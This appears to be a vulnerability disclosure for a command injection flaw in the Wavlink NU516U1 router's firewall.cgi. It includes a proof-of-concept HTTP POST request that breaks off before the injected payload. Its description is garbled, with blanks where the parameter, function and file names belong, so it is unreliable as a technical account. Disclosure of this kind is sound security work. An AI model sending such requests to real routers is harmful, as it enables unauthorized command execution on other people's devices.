Critical Vulnerability Information Overview Vendor: Wavlink Product: NU516U1 Version: M16U1_V240425 Type: Command Injection Vulnerability Description Wavlink NU516U1 M16U1 V240425 has been found to contain a command injection vulnerability via the parameter in the function within the file. Vulnerability Details In the function, the value of the parameter is retrieved from user input. If the parameter value is , the function is called. Within the function, the value of the parameter is obtained via a POST request, and then passed to the variable using the function, which is ultimately passed to the function for execution. POC (Proof of Concept) ```http POST /cgi-bin/firewall.cgi HTTP/1.1 Host: 192.168.0.1 Content-Length: 133 Cache-Control: max-age=0 Accept-Language: zh-CN,zh;q=0.9 Origin: http://192.168.0.1 Content-Type: application/x-www-form-urlencoded Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/ Referer: http://192.168.0.1/html/networkSetting.shtml Cookie: session=4338672393 Connection: keep-alive firewall=websSysFirewall&blockSynFloodEnabled-1&pingFrmWANFilterEnabled-1&blockPortScanEnabled-1&r